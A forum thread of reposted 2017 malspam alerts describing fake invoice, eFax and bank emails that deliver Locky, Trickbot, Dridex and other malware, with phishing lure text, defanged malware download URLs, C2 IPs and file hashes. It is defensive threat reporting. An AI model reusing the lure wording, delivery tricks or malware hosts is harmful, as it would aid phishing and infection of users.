Fake 'Scan Data' SPAM - delivers Locky via 'DDE exploit'
- https://myonlinesecurity.co.uk/locky-ransomware-delivered-via-dde-exploit-scan-data-malspam-no-replyvictim-domain/
24 Oct 2017 - "... Once again the word doc contains embedded links that use the 'DDE exploit' to contact a remote server & get a base64 encoded string which decodes to a set of instructions to contact a list of urls in turn, until one responds, to download a small file which in turn downloads the main Locky ransomware binary...
... easy to protect against by changing 1 simple setting in Microsoft Word (provided your company does not use the DDE 'feature' to dynamically update word files with content from Excel spreadsheets etc) See HERE for details:
> https://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/#dde ..."
___
Fake 'Order acknowledgement' SPAM - malicious attachment
- http://blog.dynamoo.com/2017/10/malware-spam-order-acknowledgement-for.html
24 Oct 2017 - "A change to the usual -Necurs- rubbish, this -fake- order has a malformed .z archive file which contains a malicious executable with an icon to make it look-like an Office document:
Reply-To: purchase@ animalagriculture .org
To: Recipients [DY]
Date: 24 October 2017 at 06:48
Subject: FW: Order acknowledgement for BEPO/N1/380006006(2)
Dear All,
Kindly find the attached Purchase order# IT/IMP06/06-17 and arrange to send us the order acknowledgement by return mail.
Note: Please expedite
the delivery as this item is very urgently required.
Regards, Raj Kiran
(SUDARSHAN SS) NAVAL SYSTEMS (S&CS) ...
Attached is a file -Purchase order comfirmation.doc.z- which contains a malicious executable 'Purchase order comfirmation.exe' which currently has a detection rate of 12/66*. It looks like the archive type does -not- actually match the extension:
> https://3.bp.blogspot.com/-fAXTqMJsHws/We700jQsXuI/AAAAAAAAMcA/ibMuiLgbcvoK_TUPgf8Nvtazi3E4pUtKACLcBGAs/s1600/7zip-error.png
If the intended target -hides- file extensions then it is easy to see how they could be fooled:
> https://2.bp.blogspot.com/-rrnVYS9MZLA/We71BknldmI/AAAAAAAAMcE/9CbPWH_wB0YbgukhZZMBnnPERq7DqLQLQCLcBGAs/s1600/po.png
... VirusTotal shows this information about the file**...
The Hybrid Analysis*** for is a little interesting (seemingly identifying it as Loki Bot), showing the malware phoning home to:
jerry.eft-dongle .ir/njet/five/fre.php (188.165.162.201 / Mizban Web Paytakht Co. Ltd., Iran)
> https://www.virustotal.com/en/ip-address/188.165.162.201/information/
... RIPE show them as being in Tehran:
> https://www.ripe.net/membership/indices/data/ir.mwp.html
... if you are -not- interested in sending traffic to Iran, Mizban Web Paytakht own AS64428 which comprises of 185.165.40.0/22 as well. I'll make a guess that the 188.165.162.200/29 range may be -insecure- and could be worth blocking... You probably -don't- need to accept .z attachments at your mail perimeter, and any decent anti-spam tool should be able to look inside archives to determine was is in there."
* https://www.virustotal.com/en/file/87fd3dae059be4f0cc2035e392436fd778606c53388848c98d81b050433e010f/analysis/
Purchase order comfirmation.exe
** File detail: SysInv2.exe
*** https://www.hybrid-analysis.com/sample/87fd3dae059be4f0cc2035e392436fd778606c53388848c98d81b050433e010f?environmentId=100
DNS Requests
188.165.162.201
Contacted Hosts
188.165.162.201
:fear::fear: :mad:
AplusWebMaster
2017-10-25, 14:24
FYI...
Fake 'Quotation' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-quotation-update-request-delivers-malware/
25 Oct 2017 - "... an email with the subject of 'Re: Quotation' pretending to come from SNG Equipment <sales@ sngequipment .com> (in previous similar emails, the sender & companies mentioned in the email body were fairly random). I am not entirely sure what malware this is. Indications are it could be Lokibot... This file has an icon that makes it look like it is an Excel spreadsheet. Unless you have “show known file extensions enabled“, it can easily be mistaken for a genuine XLS spreadsheet instead of the .EXE file it really is, so making it much more likely for you to accidentally open it and be infected...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/re-Quotation-email.png
Quotation.zip: Extracts to: Quotation.exe - Current Virus total detections 12/65*. Payload Security** ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/2a1b3cf8d8b4c72d85e14a8673588a1e76b0407ad8375bcb9c02f612c0090076/analysis/1508905407/
Quotation.exe
** https://www.hybrid-analysis.com/sample/2a1b3cf8d8b4c72d85e14a8673588a1e76b0407ad8375bcb9c02f612c0090076?environmentId=100
___
Fake 'Payment slip' SPAM - delivers Java Trojan
- https://myonlinesecurity.co.uk/fake-payment-slip-copy-malspam-delivers-java-trojan/
25 Oct 2017 - "... emails containing java Adwind, Java Jacksbot or other Java backdoor or Remote Access Trojans. We see these sort of emails frequently. Today’s has a slightly different subject and email content to many of the previous ones. This has a link-to-download-the-java-file rather than an attachment containing the malware...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Payment-Slip-Copy.png
The -link- hidden behind the image goes to
http ://www.system.air-alicante .eu/lib/css/Payment508879883.jar (519kb)
Current Virus total detections 1/62*. Payload Security**... system.air-alicante .eu looks to be a compromised Virtual Airline Site that appears to have been abandoned by its owner after a server crash. It was registered by Godaddy in July 2016 to a German Registrant. Currently hosted on 206.214.223.170 ServInt AS25847 which appears to be “owned” by a reseller fivedev .net who doesn’t have any abuse or contact details... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4237d996cdfccb66f498b3f7e674fa0b185a7f812e1c2058b75f9eb0a89ea23c/analysis/1508882800/
** https://www.hybrid-analysis.com/sample/4237d996cdfccb66f498b3f7e674fa0b185a7f812e1c2058b75f9eb0a89ea23c?environmentId=100
system.air-alicante .eu: 206.214.223.170: https://www.virustotal.com/en/ip-address/206.214.223.170/information/
> https://www.virustotal.com/en/url/7c437ec90c2c3c4142ef7b172df8a93570b0791eb4871743fd2d4e37617149ee/analysis/
___
Fake 'Payment Advice' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-payment-advice-malspam-transferdept-com-delivers-malware/
25 Oct 2017 - "... an email with the subject of 'RE: Payment Advice 2000076579' (probably random numbers, although both copies I received have the same numbers) pretending to come from OFFICE <office@ transferdept .com>. with an ACE file attachment (ACE files are a lesser known form of zip file that needs special programs to unzip them. A high proportion of recipients will -not- have this software on their commuter)... no idea what malware this actually is, although it is quite well detected on Virus Total as a generic malware.... As far as I can determine transferdept .com is a domain that is up for sale and has no website etc associated with it...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Payment-Advice-2000076579.png
PAYMENT.ace (VirusTotal 10/59*): Extracts to: PAYMENT.exe Current Virus total detections 28/67**.
Payload Security[3]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/258600ef266cf9c0ae6634e606d30a34646e2230c2513c818fb982b11397d3fe/analysis/1508921444/
** https://www.virustotal.com/en/file/e527d71664b1e3fcf2fcfd4b4d300dbb227bd5b9ff48353397461f85ebfb629b/analysis/1508933216/
PAYMENT.exe
3] https://www.hybrid-analysis.com/sample/e527d71664b1e3fcf2fcfd4b4d300dbb227bd5b9ff48353397461f85ebfb629b?environmentId=100
Contacted Hosts
216.58.209.238
transferdept .com: A temporary error occurred during the lookup...
___
Fake 'Sage invoice' SPAM - delivers Dridex
- https://myonlinesecurity.co.uk/fake-your-sage-subscription-invoice-delivers-dridex-banking-trojan/
25 Oct 2017 - "... an email with the subject of 'Your Sage subscription invoice is ready' pretending to come from Sage which delivers Dridex banking trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Your-Sage-subscription-invoice-is-ready_-email.png
... The link-in-the-email goes to a -compromised- or fraudulently set up OneDrive for business/ SharePoint site where a zip file containing a .js file is downloaded. That eventually downloads the Dridex banking Trojan:
https ://tailoredpackaging-my.sharepoint .com/personal/bec_tailoredpackaging_com_au/_layouts/15/guestaccess.aspx?docid=0b5a1a2799b6e419daf97f646640e195b&authkey=AduyYkbo5mf9IESLsGPE6yk
Sage subscription invoice.zip: Extracts to: Sage subscription invoice.js Current Virus total detections 2/59*
Payload Security** | Dridex Payload VirusTotal 13/67[3]| Payload Security[4]... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/da2986ad7dff9a406a1606716b4ba2a27189ebe34dc80cadbc7ec3836b64e169/analysis/1508929523/
Sage subscription invoice.js.bin
** https://www.hybrid-analysis.com/sample/da2986ad7dff9a406a1606716b4ba2a27189ebe34dc80cadbc7ec3836b64e169?environmentId=100
DNS Requests
104.146.164.67
Contacted Hosts
199.21.115.94
162.243.137.50
173.214.174.107
104.236.49.165
3] https://www.virustotal.com/en/file/fc40d3f0fad65e6833b4b839d2c332693cd31eb4cc2fae7fe5cd387e6daa61f0/analysis/1508933673/
mvrdcoqbki2.exe
4] https://www.hybrid-analysis.com/sample/f24354e54e4b59f6c327b1f7e144092647e726505acde5595a8386e7c2c6fa8a?environmentId=100
Contacted Hosts
199.21.115.94
162.243.137.50
173.214.174.107
104.236.49.165
tailoredpackaging-my.sharepoint .com: 104.146.164.27: https://www.virustotal.com/en/ip-address/104.146.164.27/information/
:fear::fear: :mad:
AplusWebMaster
2017-10-26, 14:55
FYI...
Fake 'TRANSFER PAYMENT ERROR' SPAM - delivers malware
- https://myonlinesecurity.co.uk/transfer-payment-error-urgent-attention-malspam-delivers-malware/
26 Oct 2017 - "... an email with the subject of 'TRANSFER PAYMENT ERROR (URGENT ATTENTION!!!)' pretending to come from OFFICE <office@ transferdept .com> with an ACE file attachment (ACE files are a lesser known form of zip file that needs special programs to unzip them. A high proportion of recipients will not have this software on their commuter). Yesterday we saw a similar malspam campaign using the same-email details spoofing transferdept .com[1]... not sure what malware this actually is, although it is quite well detected on Virus Total as a generic malware. It is most probably Fareit trojan...
1] https://myonlinesecurity.co.uk/fake-payment-advice-malspam-transferdept-com-delivers-malware/
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/TRANSFER-PAYMENT-ERROR-URGENT-ATTENTION-email.png
PAYMENT ADVICE.ace (VirusTotal 19/59*): Extracts to: PAYMENT ADVICE.exe
- Current Virus total detections 29/66**. Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c85a4ac5918b00e4cfe12cca358bbb9def3618b8018c066a90a509b10dccc8f4/analysis/1509003325/
** https://www.virustotal.com/en/file/65e909bf8605f223ba3e7ba461e01d2285ec453301dca71e86196f80d3289480/analysis/1509008143/
PAYMENT ADVICE.exe
*** https://www.hybrid-analysis.com/sample/65e909bf8605f223ba3e7ba461e01d2285ec453301dca71e86196f80d3289480?environmentId=100
___
Fake 'Invoice' SPAM - delivers Fareit trojan
- https://myonlinesecurity.co.uk/more-fake-invoices-with-an-r23-file-extension-delivers-fareit-trojan/
26 Oct 2017 - "... an email with the subject of 'Re: Invoice' pretending to come from Sales (random names and email addresses) delivers Fareit/Pony trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/re-invoice_email.png
NEW INVOICE.R23 (113kb): Extracts to: NEW INVOICE .com (which is an absolutely massive 11.5MB in size)
Current Virus total detections 14/66*. Payload Security**| tries to contact
http ://laximdiamond .com/fta/panel/shit.exe (which gives a 404) however there is an open directory
http ://laximdiamond .com/fta/panel/ where we see this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/laximdiamond.png
It should be noted that this file has an invalid Microsoft Digital signature that expired in 2011:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/new-invoice-invalid-Microsoft-digiatl-signature.png
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0f7f7ce1ab76f3588d806d0a4effea05d943aa0067924c3bce16163c5600daff/analysis/
daff.exe
Additional Information:
File names: Madhavan.exe
daff.exe
NEW INVOICE .com
Madhavan
NEW INVOICE .com
** https://www.hybrid-analysis.com/sample/0f7f7ce1ab76f3588d806d0a4effea05d943aa0067924c3bce16163c5600daff?environmentId=100
DNS Requests
45.122.138.22
Contacted Hosts
45.122.138.22
laximdiamond .com: 45.122.138.22: https://www.virustotal.com/en/ip-address/45.122.138.22/information/
> https://www.virustotal.com/en/url/7d488f9de61f649840cf2f1f16acc212517f7cf144f2efc5456e1fda95996c4d/analysis/
___
Fake 'account documents' SPAM - delivers Trickbot via DDE exploit
- https://myonlinesecurity.co.uk/fake-lloyds-bank-your-account-documents-deliver-trickbot-banking-trojan-via-the-dde-exploit/
26 Oct 2017 - "... using the DDE exploit[1] to perform malware campaigns... today the Trickbot gang have got in the act with an email with the subject of 'Your account documents' pretending to come from Lloyds Bank but actually coming from a look-a-like domain <noreply@ lloydsbankdownload .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
1] https://www.bleepingcomputer.com/news/security/microsoft-office-attack-runs-malware-without-needing-macros/
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Lloyds-Bank-Your-account-documents-email.png
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Documents_docx.png
Documents.docx - Current Virus total detections 4/58*. Payload Security**...
This malware docx file downloads from
http ://preview.tastymovies .com/moviefiles/lorangosor.png which of course is -not- an image file but a renamed .exe file that gets renamed to ect.exe (VirusTotal 12/67***)
Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services.
lloydsbankdownload .com hosted on numerous servers and IP addresses and sending the emails via 185.106.121.26 smtp3.wow-me .org | 95.211.213.219 | 185.2.81.3 | 213.152.162.231 | All of which are based in Netherlands... DO NOT follow the advice they give to enable macros or enable editing to see the content...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/48115dc13a65640f433a4b584c5838b7173b08ea58e2ebba12dc23a10fe60c52/analysis/1509019722/
ec4b69380c33a9fa2b0145ed0b118ef2.doc
** https://www.hybrid-analysis.com/sample/48115dc13a65640f433a4b584c5838b7173b08ea58e2ebba12dc23a10fe60c52?environmentId=100
DNS Requests
37.120.182.208
69.12.77.100
Contacted Hosts
69.12.77.100
37.120.182.208
195.133.146.122
194.87.235.112
*** https://www.virustotal.com/en/file/c12fb1c35c7d816729fad821c0506bc5492bf7565e2b3d0ccd28c571b3de5d5a/analysis/
smtp3.wow-me .org: A temporary error occurred during the lookup...
lloydsbankdownload .com: 95.211.213.219
185.2.81.3
213.152.162.231
185.106.121.26
tastymovies .com: 69.12.77.100: https://www.virustotal.com/en/ip-address/69.12.77.100/information/
> https://www.virustotal.com/en/url/1ad947dac30f8b79119f51d4d167ee0c4ee1614b12b618c16d8d0b14a3d27b03/analysis/
___
Fake 'RBS bank line secure email' SPAM - delivers Trickbot via DDE exploit
- https://myonlinesecurity.co.uk/fake-rbs-bank-line-secure-email-delivers-trickbot-via-dde-exploit/
26 Oct 2017
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/New-Secure-Message-Royal-Bank-of-Scotland-RBS-bank-line-secure-email.png
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/rbs189582981224-124533._docx.png
DO NOT follow the advice they give to enable macros or enable editing to see the content...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
(More detail at the myonlinesecurity.co.uk URL above. )
:fear::fear: :mad:
AplusWebMaster
2017-10-31, 15:21
FYI...
Fake 'Invoice' SPAM - delivers Locky via word docs with embedded OLE objects
- https://myonlinesecurity.co.uk/blank-emails-with-fake-invoice-attachments-deliver-locky-ransomware-via-word-docs-with-embedded-ole-objects/
31 Oct 2017 - "... another change in the Necurs botnet malspam delivery that normally delivers Locky ransomware or Trickbot banking trojan. After a week or so of using the DDE exploit, today they have switched back to embedded-OLE-objects inside a word doc... The emails pretend to be invoices with a completely empty-blank-body... The word doc contains an embedded PowerShell -script- that runs when you follow their prompts to double-click-the-image. This contacts a remote server where it opens in memory (without saving to the disc in any obvious way) a set of instructions to contact a list-of-urls in turn, until one responds, to download a small file...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Invoice-INV0000808_email.png
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Invoice-INV0000808_doc.png
Invoice INV0000808.doc - Current Virus total detections 5/61*. Payload Security** contacts
http ://christakranzl .at/eiuhf384 where it downloads to memory a set of instructions that give
these 6 urls:
"http ://projex-dz .com/i8745fydd”,
“http ://celebrityonline .cz/i8745fydd”,
“http ://sigmanet .gr/i8745fydd”,
“http ://apply.pam-innovation .com/i8745fydd”,
“http ://bwos .be/i8745fydd”,
“http ://zahntechnik-imlau .de/i8745fydd”
... Using a UK based IP number, this delivered requ4.exe which is an old well known remote admin tool Netcat. (VirusTotal 48/67[3])... using a USA based IP via a proxy, I also got requ4.exe (from the same urls) but a totally different version that looks like Locky ransomware (VirusTotal 15/66[4]) (Payload Security[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b510684253a4142aec0a3cf8f8bd13b551408917ac98cce6bde1a480ebc56532/analysis/1509442810/
** https://www.hybrid-analysis.com/sample/b510684253a4142aec0a3cf8f8bd13b551408917ac98cce6bde1a480ebc56532?environmentId=100
DNS Requests
88.198.9.176
5.196.81.12
Contacted Hosts
88.198.9.176
5.196.81.12
3] https://www.virustotal.com/en/file/7379c5f5989be9b790d071481ee4fdfaeeb0dc7c4566cad8363cb016acc8145e/analysis/1509448777/
nc.exe
4] https://www.virustotal.com/en/file/d97be402740f6a0fc70c90751f499943bf26f7c00791d46432889f1bedf9dbd2/analysis/1509452021/
requ4.exe
5] https://www.hybrid-analysis.com/sample/d97be402740f6a0fc70c90751f499943bf26f7c00791d46432889f1bedf9dbd2?environmentId=100
DNS Requests
77.93.62.179
Contacted Hosts
77.93.62.179
5.196.81.12: https://www.virustotal.com/en/ip-address/5.196.81.12/information/
> https://www.virustotal.com/en/url/4fd9ed5cc7e7adeb69f7b047e2839952af863e5a48749dd6cf94f57162ad71de/analysis/
88.198.9.176: https://www.virustotal.com/en/ip-address/88.198.9.176/information/
> https://www.virustotal.com/en/url/c253532d0025b938e18360fcaaaa445d5a624b65413579c34be2847bea9c66b5/analysis/
:fear::fear: :mad:
AplusWebMaster
2017-11-03, 14:49
FYI...
Banking Trojan targets Google Search Results (SEO)
- http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html
Nov 2, 2017 - "It has become common for users to use Google to find information that they do not know. In a quick Google search you can find practically anything you need to know. Links returned by a Google search, however, are not guaranteed to be safe. In this situation, the threat actors decided to take advantage of this behavior by using Search Engine Optimization (SEO) to make their malicious links more prevalent in the search results, enabling them to target users with the Zeus-Panda-banking-Trojan. By poisoning the search results for specific banking related keywords, the attackers were able to effectively target specific users in a novel fashion. By targeting primarily financial-related keyword searches and ensuring that their -malicious- results are displayed, the attacker can attempt to maximize the conversion rate of their infections as they can be confident that infected users will be regularly using various financial platforms and thus will enable the attacker to quickly obtain credentials, banking and credit card information, etc. The overall configuration and operation of the infrastructure used to distribute this malware was interesting as it did not rely on distribution methods that Talos regularly sees being used for the distribution of malware. This is another example of how attackers regularly refine and change their techniques and illustrates why ongoing consumption of threat intelligence is essential for ensuring that organizations remain protected against new threats over time... The initial vector used to initiate this infection process does not appear to be email based. In this particular campaign, the attacker(s) targeted specific sets of search keywords that are likely to be queried by potential targets using search engines such as Google. By leveraging compromised web servers, the attacker was able to ensure that their malicious results would be ranked highly within search engines, thus increasing the likelihood that they would be clicked on by potential victims...
Having a sound, layered, defense-in-depth strategy in place will help ensure that organizations can respond to the constantly changing threat landscape. Users, however, must also remain vigilant and think twice before clicking-a-link, opening-an-attachment or even blindly trusting the results of a Google search..."
IPs Distributing Maldocs:
67.195.61.46: https://www.virustotal.com/en/ip-address/67.195.61.46/information/
C2 IP Addresses:
82.146.59.228: https://www.virustotal.com/en/ip-address/82.146.59.228/information/
(More detail at the talosintelligence URL above.)
___
'Coin Miner' Malware - hits Google Play
- http://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/
Oct 30, 2017 - "... Recently, we found that apps with -malicious- cryptocurrency mining-capabilities on Google Play. These apps used dynamic JavaScript loading and native code injection to avoid detection. We detect these apps as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER. This is not the first time we’ve found these types of apps on app stores. Several years ago, we found -malicious- apps on the Google-Play-store detected as ANDROIDOS_KAGECOIN, a malware family with hidden-cryptocurrency-mining capabilities:
> https://www.gdatasoftware.com/blog/2014/02/23969-android-malware-goes-to-the-moon
However, we’re now seeing apps used for this purpose, which we detect as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER. This is not the first time we’ve found these types of apps on app stores. Several years ago, we found malicious apps on the Google Play store detected as ANDROIDOS_KAGECOIN, a malware family with hidden cryptocurrency mining capabilities.*
* https://blog.gdatasoftware.com/blog/article/android-malware-goes-to-the-moon.html
... We’ve previously seen tech support scams** -and- compromised websites used to deliver the Coinhive JavaScript cryptocurrency miner to users. However, we’re now seeing apps used for this purpose, which we detect as ANDROIDOS_JSMINER.
** http://blog.trendmicro.com/trendlabs-security-intelligence/eitest-campaign-uses-tech-support-scams-deliver-coinhives-monero-miner/
We found two apps; one supposedly helps users pray the rosary, while the other provides discounts of various kinds:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/10/android-mining-1.png
...
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/10/android-mining-2.png
Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key... This JavaScript code runs within the app’s webview, but this is -not- visible to the user because the webview is set to run in -invisible- mode by default... Another family of malicious apps takes -legitimate-versions- of apps and adds mining libraries, which are then repackaged and distributed. We detect these as ANDROIDOS_CPUMINER. One version of this malware is in Google Play and disguised as a wallpaper application:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/10/android-mining-5.png
These threats highlight how even mobile devices can be used for cryptocurrency mining activities, even if, in practice, the effort results in an insignificant amount of profit. Users should take note of -any- performance degradation on their devices after installing an app. We have reached out to Google, and the apps mentioned in this post are no longer on Google Play..."
Related posts: http://blog.trendmicro.com/trendlabs-security-intelligence/bankbot-found-google-play-targets-ten-new-uae-banking-apps/
> http://blog.trendmicro.com/trendlabs-security-intelligence/eitest-campaign-uses-tech-support-scams-deliver-coinhives-monero-miner/
> http://blog.trendmicro.com/trendlabs-security-intelligence/leakerlocker-mobile-ransomware-threatens-expose-user-information/
> http://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/
"... Conclusion: Fileless attacks are becoming more common. Threat actors are increasingly using attack methods that work directly from memory and use legitimate tools or services*. In this case, WMI subscriptions have been used by this cryptocurrency-mining malware as its -fileless- persistence mechanism. Since there are no malware files on the hard drive, it’s more difficult to detect..."
* Fileless Threats that Abuse PowerShell
> https://www.trendmicro.com/vinfo/us/security/news/security-technology/security-101-the-rise-of-fileless-threats-that-abuse-powershell
:fear::fear: :mad:
AplusWebMaster
2017-11-07, 12:48
FYI...
Fake 'invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-invoice-from-nxdocumentsend-at-your-own-email-address-delivers-locky-ransomware/
7 Nov 2017 - "... an email with a subject of 'Invoice #231910390' (random numbers) pretending to come from XXDocumentSend at your own email address or company domain... Once again the word doc contains an embedded OLE object that when clicked on opens a PowerShell script which contacts a remote server & get a text string which contains a set of instructions to contact a list of urls in turn, until one responds, to download the main Locky ransomware or Trickbot binary...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/Invoice-231910390-email.png
... over the last couple of weeks or so the downloaders from the Necurs botnet used system fingerprinting to decide which malware to give to any victim. Certain countries and IP ranges got Locky, others got Trickbot banking trojan. I am pretty sure that these Word embedded OLE downloaders and the downloaders will also be using the same techniques:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/word-doc-with-embeded-ole-object.png
115403772_11_07_2017_14_87_41.doc - Current Virus total detections 11/60*. Payload Security** | contacts
‘http ://gotcaughtdui .com/693’ where it downloads to memory the text string which contains these 6 urls
"http ://teesaddiction .com/JHgd3Dees“,
”http ://christaminiatures .nl/JHgd3Dees“,
”http ://336.linux1.testsider .dk/JHgd3Dees“,
”http ://florastor .net/JHgd3Dees“,
”http ://heinzig .info/JHgd3Dees“,
”http ://muchinfaket .net/p66/JHgd3Dees”
This delivers wera4.exe (VirusTotal 10/66[3]) (Payload Security[4])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/2389ecc421ef80711344174f11f07cd68502ea1723630d46c014640156bc04bd/analysis/1510048862/
115403772_11_07_2017_14_87_41.doc
** https://www.hybrid-analysis.com/sample/2389ecc421ef80711344174f11f07cd68502ea1723630d46c014640156bc04bd?environmentId=100
DNS Requests
132.148.21.213
217.73.227.10
Contacted Hosts
132.148.21.213
217.73.227.10
3] https://www.virustotal.com/en/file/28df46fe9876341394f8f0e4dcf17bd76f451ea8347104470acb59291f1735ce/analysis/
4] https://www.hybrid-analysis.com/sample/28df46fe9876341394f8f0e4dcf17bd76f451ea8347104470acb59291f1735ce?environmentId=100
___
Fake 'eFax' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-you-have-a-new-highly-encrypted-secure-fax-from-efax-malspam-delivers-trickbot-banking-trojan/
7 Nov 2017 - "An email with the subject of 'You have a new fax' pretending to come from eFax Corporate but actually coming from a look-a-like domain <message@ efax-secure .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/fake-You-have-a-new-highly-encrypted-secure-fax-from-eFax.png
Today’s example of the spoofed domains are, as usual, registered via Godaddy as registrar.
efax-secure .com hosted on and sending the emails via 134.19.180.224 hosted-by .rapidrdp .com AS49453 Global Layer B.V. | 95.211.214.251 AS60781 LeaseWeb Netherlands B.V.| 185.106.121.147 free.hostsailor .com AS60117 Host Sailor Ltd. | 185.2.81.10 guish.elvb-listverify .com AS49981 WorldStream B.V. |
HighlyEncryptedFax.doc - Current Virus total detections 3/59*. Payload Security**
This malware file downloads from
http ://styleof.co .uk/ser1107.png which of course is -not- an image file but a renamed .exe file that gets renamed to Hmmd.exe (VirusTotal 8/61[3]). An alternative download location is
http ://tablet-counter .com/ser1107.png
This email -attachment- contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/HighlyEncryptedFax_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/eb0c0d977c9c48528181640384aec3eff83dbd0d7ad8cbb9cfa4fcc1d17cd7a2/analysis/1510053544/
HighlyEncryptedFax.doc
** https://www.hybrid-analysis.com/sample/eb0c0d977c9c48528181640384aec3eff83dbd0d7ad8cbb9cfa4fcc1d17cd7a2?environmentId=100
DNS Requests
37.120.182.208
79.171.39.110
146.255.32.109
Contacted Hosts
79.171.39.110
146.255.32.109
37.120.182.208
176.120.126.21
194.87.93.48
62.109.10.76
3] https://www.virustotal.com/en/file/c7a3123a5cff9c78e2fd926c6800a6c6431c8bca486ce11319a9a8f6fa83945c/analysis/1493725297/
Epvuyf.exe
:fear::fear: :mad:
AplusWebMaster
2017-11-08, 17:33
FYI...
Fake 'eFax' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-banking-trojan-continues-to-be-delivered-via-fake-efax-messages/
8 Nov 2017 - "... this week the Trickbot gangs have decided to continue with -imitating- eFax to distribute their malware. Unlike yesterday’s version[1] which looked quite realistic. Today’s version is quite a pale imitation...
1] https://myonlinesecurity.co.uk/fake-you-have-a-new-highly-encrypted-secure-fax-from-efax-malspam-delivers-trickbot-banking-trojan/
This example is an email containing the subject of 'You have received a fax message' pretending to come from eFax but actually coming from a series of look-a-like domains <noreply@ faxmessage*** .ml> (*** = 1 to 599) with a malicious word doc attachment is the second of today’s spoofs of a well-known company, bank or public authority delivering Trickbot banking Trojan...
Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/You-have-received-a-fax-message_8_nov_17.png
faxmessage*** .ml is being hosted on different IP numbers & ranges all appearing to be -compromised- ISP IP numbers from major ISPs in UK, Europe & USA. In previous phishing and malware scams by this criminal gang they used a range of domain numbers between 1 and 600 over several days, so there could be a lot more to come.
efax1298357237174_23536.doc - Current Virus total detections 5/60*. Payload Security**
This malware doc file downloads using PowerShell from
http ://transfercar24 .de/xjersey/grondbag.png which of course is -not- an image file but a renamed .exe file that gets renamed to slaaen.exe (VirusTotal 18/67***)
Alternative download site:
http ://theartofinvestment .co.uk/authentic/grondbag.png
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/08/efax42542153_2425_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/7f50019f5e83818af3e8da4c03e676320c4c3edb3efcdca4225892a928161e2a/analysis/1510147039/
efax1298357237174_23536.doc
** https://www.hybrid-analysis.com/sample/7f50019f5e83818af3e8da4c03e676320c4c3edb3efcdca4225892a928161e2a?environmentId=100
DNS Requests
200.47.70.193
127.0.0.4
78.47.139.102
87.106.3.106
Contacted Hosts
87.106.3.106
78.47.139.102
82.146.62.66
92.53.67.5
*** https://www.virustotal.com/en/file/cd91143d8634199004677c14fd1919b8cf01397979e9839f5325d8beade1609b/analysis/1510152607/
grondbag.png.exe
transfercar24 .de: 87.106.3.106: https://www.virustotal.com/en/ip-address/87.106.3.106/information/
> https://www.virustotal.com/en/url/b8364d93faa6a9d87b467c136ee555b7db825c88fbecf865055676dd92d0bbd0/analysis/
theartofinvestment .co.uk: ... A temporary error occurred during the lookup...
___
Drive-by cryptocurrency mining
> https://www.helpnetsecurity.com/2017/11/08/drive-by-cryptocurrency-mining/
Nov 8, 2017
(MANY details at the URL above.)
:fear::fear: :mad:
AplusWebMaster
2017-11-10, 17:03
FYI...
